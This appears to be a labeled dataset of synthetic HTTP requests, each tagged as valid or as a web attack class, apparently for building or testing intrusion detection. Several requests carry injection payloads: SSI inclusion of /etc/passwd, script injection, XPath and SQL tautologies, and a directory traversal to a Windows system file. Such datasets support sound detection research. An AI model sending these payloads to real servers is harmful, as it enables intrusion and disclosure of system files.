Upgrade: lshhnT/1.9, eeb/3.9, Ia5/6.6, ttme/7.7
Warning: 400 www.satoatm.gif "qstaeInaenai" 
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 002205670560863085
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9900
Start - Id: 39704
class: SSI
GET /gR.aspx?gnlho=2&oasemmLaueb=1123&nsTqkOm9Liaerd=nV3fy&thBp=xnxp_ecadt%2B+1%5C6&eitbrti=%3C%21--++++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22--%3E&fbbt=713&taaycr=cmki&h3pm7=jt0%27ccopyon0dern HTTP/1.0
Host: www.peehtrt.cz
Connection: keep-alive
Accept: application/postscript;q=0.8
Accept-Charset: iso-2022-kr;q=0.2, cp-950
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.6
Cache-Control: max-age=4122
Client-ip: 120.48.93.141
Cookie: ine6ele=Eose;5YolnErSiOl=naUtFOC5j0O
Cookie2: $Version="4"
Date: Sat, 17 Mar 07 10:46:36 GMT
ETag: "U0JnnPHBGTG9WCy"
Expect: bufr=y5wn1
From: dOrrrspe@5lmtas.st
If-Modified-Since: Fri, 29 Apr 05 15:34:22 CET
If-Unmodified-Since: Wed, 13 Aug 08 03:42:32 UTC
If-Match: "IvKCUr8qbgb3QHm_"
If-None-Match: "nPT6c8aTTnrw7xfHZv"
If-Range: Tue, 19 May 09 16:32:23 GMT
Max-Forwards: 2
MIME-Version: 7.2
Pragma: tt1pi=ia
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: Digest opaque="ssheh"
Range: 61-,98874-5,222224-
Referer: /rnej/aanase3n/isoruso/iTit28/leOnt.php
TE: gzip,deflate
Trailer: From
User-Agent: Mozilla/9.2 (compatible; Konqueror/3.3; Solaris; jlhhtiasoi; S2vs)
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 726x074
Via: 0.7 195.181.183.129:9457, 1.9 175.111.4.64, 5.1 www.eiPrrn.js
Transfer-Encoding: compress
Upgrade: effn/5.2, ajnt/0.1
Warning: 690 www.mhphpe.js:081 "aei2" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39704
Start - Id: 47631
class: XSS
GET /qXPpkJKts-r997Rxss/rnRG5G_otabmkipCIUQ/e3tyos0dM/kinF3_SBZwSJeM/Onlatonao0lrceeree/iej/aJEsyMlGVxg/estsnscno/8mLhUgoKgW-F_/a3ETY/RwPtBFstdin/kM.tiff?cA@GVsyK3nullppasswd=%3Cimg+++++src%3D++++%22+++++livescript%3A%5Balert%28%27ky9eahrt%27%29%3B%5D+++%22++++%3E&Neeeneoani0f=%2Bhi%27v&g5aadrr=A%25tfpaagr%26h&U5ipV=n6_MEFZM&temeLitad=jleee&rosEtqmwoorke=oZvp&tz1=g5d7914pnoK&Ionk620logWU=er HTTP/1.1
Host: www.S7aclal.de:88
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip, deflate;q=0.8, gzip
Accept-Language: Schnce-az;q=0.6, cxcd-66utesli
Cache-Control: no-transform
Client-ip: 58.158.9.220
Cookie: HBQWyIBJQ=4724736;ws=u5w5xqW4X;H_httpsSncg.z=6QrXb;oeHitrinooo=ncu9Iuodo;dniEp7khdeyir=lNSG8f_;gcRnyeiq0oreega=hazwtdt1xiu
Cookie2: $Version="4"
Date: Sun, 20 Apr 08 24:55:27 GMT
ETag: W/"vCJ4ze41NxoBsap4"
Expect: 100-continue
From: aampiq@d5vosUe.cz
If-Modified-Since: Thu, 01 Mar 07 05:50:37 CET
If-Unmodified-Since: Mon, 25 Aug 08 01:48:03 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Mar 05 07:25:49 CET
Max-Forwards: 17
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: ni1yEi btas=Btiewr
Authorization: Digest response="1F7Bc939dBCae48dA14F8a253eA0E8dC"
Range: -2,9608-,-156992
Referer: http://aml4l.biz/etqhe/nymt/oEi7ho/acac.swf
TE: trailers,deflate;q=0.3,trailers
Trailer: Warning
User-Agent: sitgnsn (shUO8zhO; fTuMDnYIGi; er4Q737@yk; ogw0JAzb; hv09Hea)
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: 0.1 www.rteuti.jpg
Transfer-Encoding: compress
Upgrade: euleee/5.6, eNo/6.5, estIph/1.3
Warning: 544 147.190.206.64 "e6Olrstooilettn" 
X-Forwarded-For: 111.147.190.89
X-Serial-Number: 6943669939
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47631
Start - Id: 17322
class: Valid
GET /pFNDL9Dgf6N/nFNhjtuwibhc/wr/iqKOxEC.pCXj/yurphooOLnlco/ushnto/lvhV/4aSiN.aspx?oaosehenrb=8ehexecatfromeeenO&srtrthsaoy=93&orcdd9fai=uE50&dJsaeim=hninol9sweet62see3&CBD0vps=659973&pepyft=2048816097&eSiiltneafRos=metSwi0sonhgwtisno&zconnectfHMTC=a3x HTTP/1.1
Host: 173.249.38.179
Connection: keep-alive
Accept: audio/*, text/*
Accept-Charset: big5;q=0.1, x-mac-korean, x-mac-roman;q=0.7, cp-936, iso-8859-4;q=0.8
Accept-Encoding: gzip;q=0.9
Accept-Language: *
Cache-Control: lfadk=tasinS
Client-ip: 251.211.186.188
Cookie: paivscdga=reEc;ef7a6u=e62@7T;diwopyehdttx=i 9heeoma~
Cookie2: $Version="436"
Date: Thu, 27 Jul 06 01:42:32 UTC
ETag: "QVMqCuT5TpXXe2D"
Expect: 100-continue
From: Ziuts@vomg5.it
If-Modified-Since: Tue, 09 Feb 10 23:04:46 UTC
If-Unmodified-Since: Wed, 07 Sep 05 10:24:40 CET
If-Match: "xEKX.Q9HcCJZw05"
If-None-Match: "Y4cYe5ZXesLMY33AjR"
If-Range: Tue, 06 Feb 07 01:24:09 GMT
Max-Forwards: 402
MIME-Version: 0.0
Pragma: he=fn7ox
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: Digest cnonce="nenHaa"
Range: 570800-
Referer: http://goilstni.uk/Tudpha/4umfNcm.jpeg
TE: trailers
Trailer: Range
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 1.9; ol-ie; rv:6.8.3) Gecko/87205986
UA-CPU: 68000
UA-Disp: 8556,725,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 455x7663
Via: FTP/3.4 113.21.65.101, FTP/2.8 118.137.122.27:4
Transfer-Encoding: identity
Upgrade: d0s25/3.9
Warning: 540 139.31.62.25:6754 "edlefMhEnqak" 
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 8125405037849
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 17322
Start - Id: 49603
class: XPathInjection
GET /ihoT69/1OwJGl/uLB/agdNrY5/7EYnKUbGQ/eonUaomynuz/moen1o/teseyh3xESieohhVx4.js?chiy=Ea&bt0ahut=mmr1%2Fstor%2Fyn%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D86%5D+++++%7C+oaa%2Fys%2FEnn0%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D116%5D+++or+++%27eAi%27%3D+++%27 HTTP/1.1
Host: 72.82.82.250
Connection: dh7ae
Accept: text/*;q=0.2, audio/*;q=0.7, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ewnnnnb-hawntae, ta6-i;q=0.8, x8eenbof-ctsulP;q=0.4, he-etaynw;q=0.5
Cache-Control: no-transform
Client-ip: 18.186.79.70
Cookie: telnetOZx='aite;Q@Kg=76;oyj-mSy9POu=nhlseNn'iHutao
Cookie2: $Version="97"
Date: Fri, 24 Oct 08 12:08:52 CET
ETag: "OmYn45rY5Z5qYtyD0"
Expect: 100-continue
From: tdaOt@esEtnmNs.it
If-Modified-Since: Fri, 09 Nov 07 03:06:27 GMT
If-Unmodified-Since: Sun, 13 Jul 08 14:45:52 GMT
If-Match: "eHujKSEypHPDUITto0m@"
If-None-Match: "9pggvc4YLE85.tCAZzy5"
If-Range: Tue, 25 Mar 08 02:09:17 UTC
Max-Forwards: 49
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Hsia5 4xaft=eores4
Authorization: Basic MGNudHNPZjphamF1
Range: 7852-
Referer: http://4Sdpoa.fr/ynte8y/os4iux3h/1s03Atdc/Tldaric/clae.bin
TE: gzip;q=0.4,deflate
Trailer: Via
User-Agent: u857zs http://www.oumd.biz
UA-CPU: 68000
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: baa1iu/3.2 www.cewhy.gif:6874
Transfer-Encoding: teeth; aohrR1ca=tdssarr
Upgrade: add/2.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49603
Start - Id: 42430
class: SqlInjection
GET /oa/oDN22FMhI6GtaVUf_g2/imoC5vPxN@cql/ttnbMahf/tki2/RxKaab1bIuoGdfut/lfepA4gOeqatnrdmgq/tElnegjhn/iWH/GYnetcatkU/pD1xh4p/Y5DqUunionEmoFG.jpg?E7cptroxCdin=ie%28dw%2Bni&ZT8zYFnph-T7I_=%27++++OR+%27tew3w%27++BETWEEN+++%27R%27++++AND+++++%27T&wsdpo7he61=Ed%40t HTTP/1.1
Host: 75.100.10.36
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii;q=0.6, cp-932, iso-8859-4
Accept-Encoding: identity;q=0.3, gzip, compress
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 34.227.190.70
Cookie: Id4tmochaPi4=h4eval;zgThhxdhoi=s9;ZMN1-YY5inputtmpK=met'eiiybgsound|3fromxterma|xha;rl8ORt=67;iakth8e=40978408;el6rtenHifD=3
Cookie2: $Version="2"
Date: Fri, 06 Oct 06 04:15:48 GMT
ETag: "ZSerFm.z9rWfs9@A7MH."
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Tue, 01 Sep 09 07:43:19 CET
If-Unmodified-Since: Sat, 05 Sep 09 22:55:30 UTC
If-Match: "Asx8P9sbgCYJnT."
If-None-Match: *
If-Range: Thu, 26 Jan 06 09:09:26 GMT
Max-Forwards: 6
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: NTLM c0JhbzNJZWthcmhlc25zZnpob3RBdWd0ZW5hdWFyYXVuYXRqcm9vZXR1c2hF
Range: 005696-6624,4-
Referer: http://aHhEetxZ.ch/yssnnrh/lthZdaei.conf
TE: gzip;q=0.9,chunked,deflate;q=0.6
Trailer: If-None-Match
User-Agent: 61x4uq.TPl http://www.csr5.biz
UA-CPU: 68000
UA-Disp: 9195,5329,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 0.0 www.n6stre.html, 3.8 210.134.240.168, 5.6 www.ut9oka.tiff
Transfer-Encoding: identity
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42430
Start - Id: 29048
class: Valid
GET /gKB.E0@GMWGiFc/wwlhtauye9shauhu5lc8/Fg/s.N/lJ_wO/I54zJZGEp@W0U/dgLvk3Fc.Rv.htm?attrhlaos=%2F%3E%29rrin&ctOtaidLab=access_logwj&sentt5nrnnyto4n=eautoexecen+l&ynobeletr=rV1Qa4I.B&boiiai=hRdR&har3eo=fohii&1dGeaNT=708&ieeNwtoerjeta=systemns-X%25H&qvpv=081358811 HTTP/1.1
Host: www.rotof.gov
Connection: close
Accept: video/quicktime;q=0.2, image/*;q=0.6, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 12.54.89.63
Cookie: tMce8=53877;srIe=448261365
Cookie2: $Version="78"
Date: Mon, 25 Apr 05 08:25:46 GMT
ETag: W/"7UNhncP8MDWZOP8y"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Fri, 09 May 08 16:04:00 CET
If-Unmodified-Since: Thu, 23 Jul 09 05:45:01 UTC
If-Match: "LDo3.dH@igSULtQgM"
If-None-Match: "DJe4JV9J_y@A@-zqEIJ"
If-Range: Wed, 13 Apr 05 23:47:59 GMT
Max-Forwards: 2069
MIME-Version: 8.8
Pragma: eeAorttn=eo3eienc
Proxy-Authorization: gssa mdooRR=usOT
Authorization: Basic dllkbjppN3l0cg==
Range: 2-728395,2-644,-332
Referer: /onmebsch/76neji/axcumr/T1hujj/tznmaey.doc
TE: trailers
Trailer: Max-Forwards
User-Agent: nPG@rAIMg http://www.deNhjso.st
UA-CPU: x86
UA-Disp: 3428,2745,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 890x9958
Via: FTP/2.0 145.186.112.16:2
Transfer-Encoding: nhol; yGol=lvoeilpe
Upgrade: Ymaeea/2.1, onqsd/4.3
Warning: 861 14.0.150.19 "eaQ3e" "Mon, 03 May 04 08:13:54 CET"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29048
Start - Id: 17992
class: Valid
GET /0mitzsih/tekomlt2fu9oen6ead/6J98c/vg/aAszeZff5smMm/pbsCyrigemMluhCbwsm/hl4ECfeJqRW-1J-/djLg2k_dA37/5eo4ir5daeeouird/eAM@aeM9/feseteMaD9.shtml? HTTP/1.0
Host: 152.10.12.251
Connection: gueoblt
Accept: */*;q=0.7
Accept-Charset: x-mac-ce;q=0.7
Accept-Encoding: gzip;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 253.227.5.211
Cookie: iTvd=3Arutrynh9ef;rWrmebQ=ns%u ;sOzsh=i5vdpLdDfTB;Crmzaccept9=145705493;Adn=97346
Cookie2: $Version="07"
Date: Fri, 24 Dec 04 09:26:51 UTC
ETag: "xkjsV7T1ydLFwob1c"
Expect: 100-continue
From: eiarWye@ettxietrot.net
If-Modified-Since: Mon, 01 Oct 07 12:00:57 GMT
If-Unmodified-Since: Fri, 08 Feb 08 04:07:05 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1245
MIME-Version: 0.7
Pragma: y=mOzcqo
Proxy-Authorization: NTLM cmVpeXNyYXlvZVRlczRpZWFFZWVPSG9lbGlvaW95YWZ1aWRub3I3Y3I=
Authorization: Digest nonce
Range: -44534,46459-4352,54-118133
Referer: /iMcde/qRoeev6/fmjoe.jpg
TE: trailers,chunked;q=0.5
Trailer: Range
User-Agent: iafrf/8.6
UA-CPU: Sparc
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 642x5791
Via: la3o/6.4 www.e6tAh.jpg
Transfer-Encoding: gzip
Upgrade: wci/3.8, ciesoo/6.5
Warning: 459 241.242.121.187 "idot1nq9S" 
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 84617847595022
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17992
Start - Id: 31204
class: Valid
GET /a4/VxTfA%uvdOCkygservicespasswd/eJcT2xwtIsQuF-LQtyI/kCcnxcb0OpzE7@/r7fletsjNer/oNaDVvWLmz4VeAcl.jpg? HTTP/1.0
Host: www.ta5iaso.cz
Connection: close
Accept: application/*;q=0.0, audio/basic;q=0.0, video/mpeg;q=0.6
Accept-Charset: x-mac-hebrew
Accept-Encoding: deflate;q=0.4, identity;q=0.4
Accept-Language: *;q=0.3
Cache-Control: min-fresh=5
Client-ip: 161.38.229.72
Cookie: CrijhamnnKle=l9kAW;@LmQZ=nHj;3de=%eahn<tw
Cookie2: $Version="19"
Date: Sun, 20 Sep 09 16:58:45 UTC
ETag: "FF2Tro_rtx4@In80J"
Expect: 100-continue
From: doe5j@7rdh4elrd.de
If-Modified-Since: Mon, 07 Jun 04 05:29:47 GMT
If-Unmodified-Since: Fri, 05 Oct 07 17:58:24 UTC
If-Match: "F.XOl5E.ezPR3.J6"
If-None-Match: "SED@1uaMzXRsd9x-7@W"
If-Range: "3Ns4vbDIHKkHRuA4gj_j"
Max-Forwards: 8
MIME-Version: 5.4
Pragma: da=rhg
Proxy-Authorization: teu2uo dsgreat=oatpaa5a
Authorization: li4sep restiegi=ncysx
Range: 487-253698,1-,198-1
Referer: /jw0eokW.msf
TE: gzip,deflate;q=0.8,chunked;q=0.7
Trailer: Expect
User-Agent: Mozilla/4.4 (Windows; U; WinNT 4.4; sa-aw; rv:5.6.8) Gecko/34438050
UA-CPU: x86
UA-Disp: 974,643,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5346x423
Via: FTP/4.5 203.197.122.238:4, 2.2 147.45.72.150
Transfer-Encoding: compress
Upgrade: h3ih9e/0.0, 7mwpye/2.3, Es0/2.7, atargv/1.8
Warning: 816 106.144.10.255 "FhwteaHn0a" "Wed, 27 May 09 19:09:38 UTC"
X-Forwarded-For: 169.197.9.202
X-Serial-Number: 548057772746767771
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31204
Start - Id: 12815
class: Valid
GET /c_3EiEGSynhand/tynnptye/dNtntERt/c3Z7NtkC/shoppCgtKlt/oata0aethrEaiq6mmei1/9MXZYO/ukGTqf_l36qKLaOzIh/odZlibY.html?tsugcpalrovE=nrs&ni=edqgcNoo3&tooilnPC19aS=t2rqlld HTTP/1.1
Host: www.annekit.st
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 104.144.236.15
Cookie: hiyede=ceh;2wojtrtict=iohhi;us=lqtobjectsopassthrulocationdndiTflyh- x;o4bo=Mzeval>JDmochato/ i o+>ru;xxmlJevalAXWw7=e6c1
Cookie2: $Version="827"
Date: Mon, 22 Sep 08 03:23:45 CET
ETag: W/"OC3Mp1v8cvCtQtamre"
Expect: 100-continue
From: tibfhrt@6ra7.com
If-Modified-Since: Wed, 13 Sep 06 14:43:32 CET
If-Unmodified-Since: Mon, 12 Nov 07 12:25:43 GMT
If-Match: "P5U_pHiaTMS1sqsJc"
If-None-Match: "QkgLkd2j8zorKrq9"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.3
Pragma: pMcshzue='0Stb'
Proxy-Authorization: Basic ZG5ub25pOmlwc0R5
Authorization: eaesh ttharte=Seynbho3
Range: 5-,-1
Referer: http://www.abiL.it/qjg3ez3t/atgJjn/7de1.html
TE: deflate;q=0.0,trailers
Trailer: Accept-Charset
User-Agent: 3xneeumei5nf
UA-CPU: MIPS
UA-Disp: 3127,7217,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8634x945
Via: atsocu/7.3 www.anolih.htm:24893, Ita/8.7 248.119.2.38, 2.4 135.47.30.50:8
Transfer-Encoding: compress
Upgrade: DoR/2.1, rahogo/2.6
Warning: 494 130.146.46.121 "atTyo" "Sun, 05 Oct 08 10:26:05 GMT"
X-Forwarded-For: 129.36.3.102
X-Serial-Number: 392683968
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12815
Start - Id: 46010
class: PathTransversal
PUT /u7pntsr9O/hiMSG/KDsoro/s7t/ut/postqewict/z2geZ0zvEH./hrJoiud/aCi-yYqh65dAgVYd8.gif? HTTP/1.1
Content-Length: 149
Content-Language: a
Content-Encoding: compress
Content-Location: http://pirttle.be/efehG/t8us.jsp
Content-MD5: b2dlZWFnYzlvcnlBNjFmYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Jul 08 09:41:13 GMT
Last-Modified: Sat, 19 Apr 08 23:48:02 CET
Host: 100.82.13.148
Connection: keep-alive
Accept: video/quicktime, image/gif, video/mpeg;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: saj2sy5-acttpm, oEDL-tathstD, e-WKmulr1h, c-weo;q=0.2, t3n-nm8
Cache-Control: no-cache
Client-ip: 17.228.75.155
Cookie: mwytuvecsmtvhlh=st&?o e|homeUe0ju6gpositionLc;Mhghndbw=mixtiHoprZo;WvshutdownK449=pddaeoe;Hrintdt=..\..\..\..\..\..\WINNT\system.ini;yncaNsEa=f2e i8r
Cookie2: $Version="788"
Date: Sat, 07 Aug 04 07:56:32 UTC
ETag: W/"dSxVpJqJiJ5FsSQ"
Expect: nqzigr6
If-Modified-Since: Fri, 21 Mar 08 05:14:29 UTC
If-Unmodified-Since: Wed, 12 May 04 18:17:20 UTC
If-Match: "BfrMTR44g52jBNPga"
If-None-Match: "3c6HTMR@lSXjJF5GABZ3"
If-Range: "X3njJk3dIh2ghSq-rtg"
Max-Forwards: 138
MIME-Version: 8.1
Proxy-Authorization: NTLM aWllclB0eGFxaWJjbnllbHR0ZTdlNjVkM2VlaTNzdHR1dHRp
Authorization: Digest algorithm=aeaNemid
Referer: /seHn1.exe
TE: trailers
User-Agent: JephtUjhdltwtrodn
UA-Disp: 387,609,32
Via: HTTP/9.7 242.170.142.76, 5.3 www.nEeo8.js, 6.6 208.30.219.239
Transfer-Encoding: deflate
X-Forwarded-For: 150.199.183.225
----: --------------------

pqni4eywutev=tsJqxIDk3&tmoppknn=yb1pEo0e@dno&su5rsqtss=63&Eo=o_1w@E.V&irag=eK4&erac4=19152937&obntvpi=eia&rpsTautoexecl=updatefi5se%&ssg=hsNAWn

End - Id: 46010
Start - Id: 25982
class: Valid
GET /iZunDXq/nneAmqhBn/cY3o9bAjyEF2ghM.jsp?iucBhlddjSewtl=nmifphtMtah&TuasuddpalZ=0iaB&6weiaohiu=mil05nce%28i&zttl1sti2hkyoe=19251&uoanrmeiasab4lt=15843062&kjdrcleendau=+pprsobahavinguiselect HTTP/1.0
Host: www.hiqnso.fr:80
Connection: mstn
Accept: image/*;q=0.4, text/*;q=0.3, video/mpeg
Accept-Charset: cp-950;q=0.8, x-mac-turkish, windows-1250, macintosh
Accept-Encoding: identity, deflate, gzip;q=0.9, gzip;q=0.6
Accept-Language: O-lsOllN;q=0.3, Ng-4orpr, n5sc-ns0ti0;q=0.6
Cache-Control: max-stale=3211
Client-ip: 30.171.51.177
Cookie: d6nh=r5sD;be0eoAdwmazpyAt=4;txlzw=odx;iedo=~oe4roe we [tfskdd%T;tuo4xcx=Inode7r:;amochalqe
Cookie2: $Version="9"
Date: Wed, 06 Jul 05 01:15:27 CET
ETag: W/"AwaLoZCcjYP9hz.Ghq"
Expect: 0bxnik6=e4f2
From: DTqDe@hek6bsSofn.biz
If-Modified-Since: Sat, 12 Feb 05 11:04:39 CET
If-Unmodified-Since: Sun, 17 Dec 06 17:52:26 CET
If-Match: "vvaZ55zBjQ4nKcZYwTA3"
If-None-Match: *
If-Range: *
Max-Forwards: 678
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM MWVsYTVjY2lFcjlvc2VFc3plZmVVaGdyZWJpbGFhZXJzb25lZUVzQTRs
Authorization: 1jai6 iFomomc=Sathae
Range: 4-,8-035554
Referer: http://ecefbia.be/ycze/aE2ttt/eests.aspx
TE: trailers
Trailer: Host
User-Agent: Mozilla/8.1 (compatible; 0hg4efe; Mac OS X; altuiId; 1stui1e)
UA-CPU: MIPS
UA-Disp: 199,4987,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8597x176
Via: 1.5 www.paymnwn.htm:761
Transfer-Encoding: identity
Upgrade: sweeL/7.7, xtf/2.3, 1xnyt/4.8, ssimb/4.5, iislt/5.6
Warning: 442 www.odyfti.shtml "igeotauecom8" "Mon, 10 Dec 07 02:26:29 UTC"
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 767328268470976687
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25982
Start - Id: 28369
class: Valid
GET /61KrGcwSnull.php?LiLupdatexmlGVw=+6D&kNCWEt=Oe7fgS&NearCe9ie=S1fw HTTP/1.0
Host: www.aaecadt.biz:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-8-i, euc-tw, windows-1253;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=9
Client-ip: 69.0.194.57
Cookie: zl43amo3to=41620;86te1ftumi=y5Hv0;lvyd=tfegvieosaivd;tp=huE$trLw8objecttta\xmlyohttps;6uwCes=berfnktsei5fsd68
Cookie2: $Version="946"
Date: Fri, 06 Feb 04 03:23:19 CET
ETag: W/"Rv9qS5.Q4IyyTJEOsj"
Expect: 100-continue
From: stmeR@qTts.com
If-Modified-Since: Fri, 01 Sep 06 08:51:06 CET
If-Unmodified-Since: Sat, 23 Feb 08 16:16:02 GMT
If-Match: "3zPMLCpnxJNoWocFR"
If-None-Match: "ujTTo89C2joM27W2"
If-Range: Tue, 10 Aug 04 19:14:04 CET
Max-Forwards: 2307
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest username="itd3MleO"
Authorization: Digest qop=auth
Range: 665026-
Referer: http://6ehi.st/seni0dp/nlcis/Yeeocan/7Lpn.html
TE: trailers,trailers
Trailer: Trailer
User-Agent: mRnr (jKpx9m; p6wAHtA; txSYQU)
UA-CPU: StrongARM
UA-Disp: 780,2913,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 965x809
Via: HTTP/9.8 76.241.190.133
Transfer-Encoding: deflate
Upgrade: eaa/1.9
Warning: 347 147.194.234.174 "AYtgenf8eueNtskYttu" 
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 7465297368
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28369
Start - Id: 17947
class: Valid
GET /roeWA/rS5UmGpqMvK0yWkqv4xL/lP84KZy60CeqkDszgy/rxb/f5L2_Tvn1isbbhOh/orvJkZ.asp?e1rpy1=s2&fcriihs=stlibi9a%2F+%3Fhtaccesoe1in%7Es&caiTluagertig=eaye9jle&eiqqoOsgcSldum=tts8o5rn&aei47sgetE=rcsBsEOv%40&vT1xtmpypvZB=Siwf%7Eersonq&eieUn53ejEo=e&wl=244657&hzsioges=K HTTP/1.0
Host: www.eunnhntr.biz:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-korean;q=0.4, x-mac-chinesesimp;q=0.5, euc-jp;q=0.3
Accept-Encoding: gzip, deflate, compress, deflate;q=0.5, gzip
Accept-Language: 9rOlgluf-z1dcetu
Cache-Control: no-store
Client-ip: 136.196.112.139
Cookie: tH7tTj=M;leoR=6557
Cookie2: $Version="9"
Date: Sun, 29 Jun 08 19:06:26 CET
ETag: W/".eKFhF9D9Rr07ADBs"
Expect: zihn
From: oaaseroE@iezasn.uk
If-Modified-Since: Sun, 17 Dec 06 21:31:45 GMT
If-Unmodified-Since: Sun, 12 Jul 09 12:37:01 UTC
If-Match: "@SGc5xgdSQeSm8CJ"
If-None-Match: "GDvIkfX5sezT@nbUE"
If-Range: Tue, 31 Oct 06 02:54:12 UTC
Max-Forwards: 2128
MIME-Version: 1.5
Pragma: rre=r9cWn
Proxy-Authorization: NTLM YXNyVHoweWhoaWlpc2xZZW80cm9tZjRyZXJidHlpaHNvZWVhN3p2TQ==
Authorization: Basic aXVhbHNhOmd5NE54b2Fz
Range: 6-3,883-113,10456-5
Referer: /8ges7w/srhs7Nii/w9nt.cfm
TE: deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 0.2; rv-ii; rv:4.0.9) Gecko/03972902
UA-CPU: PowerPC
UA-Disp: 5395,1752,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5744x7610
Via: FTP/1.5 www.oiodoeun.tiff
Transfer-Encoding: eFoato
Upgrade: teiEei/2.2, 59i/8.6, owtOe/6.7, sqo/0.4
Warning: 306 10.52.157.227 "ehdhhae3Rden0Pb" 
X-Forwarded-For: 58.72.123.218
X-Serial-Number: 126359960937
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17947
Start - Id: 24112
class: Valid
GET /oI3bbrvtIeY/d2pKAI/kp8KqLBoLJw4D@/uhgrZdiRhJ4uNYg/riV7H9ox/ha2RVAErOigLpVNM/lo5c.gif?arcebsnIhkoin=8ieee%40-ddocumentz4&ul-17wSm1xm=130021&emhttps0qlz-p@Z8=wgyDUKBi HTTP/1.1
Host: 191.83.87.19:96
Connection: close
Accept: image/*;q=0.7
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 1-7Bie;q=0.7, jltndrk-erpnwe, u8-csroro, etl-p;q=0.9
Cache-Control: only-if-cached
Client-ip: 120.174.30.121
Cookie: de6e=ot7eu;sriihi=aevali ;ISoad=572206
Cookie2: $Version="750"
Date: Tue, 25 Mar 08 06:52:07 GMT
ETag: "SEiZNbmCHQW3UmYqA5-"
Expect: oavt=eThntlo2
From: Asrom2hL@mwusmln.it
If-Modified-Since: Wed, 29 Apr 09 16:04:30 UTC
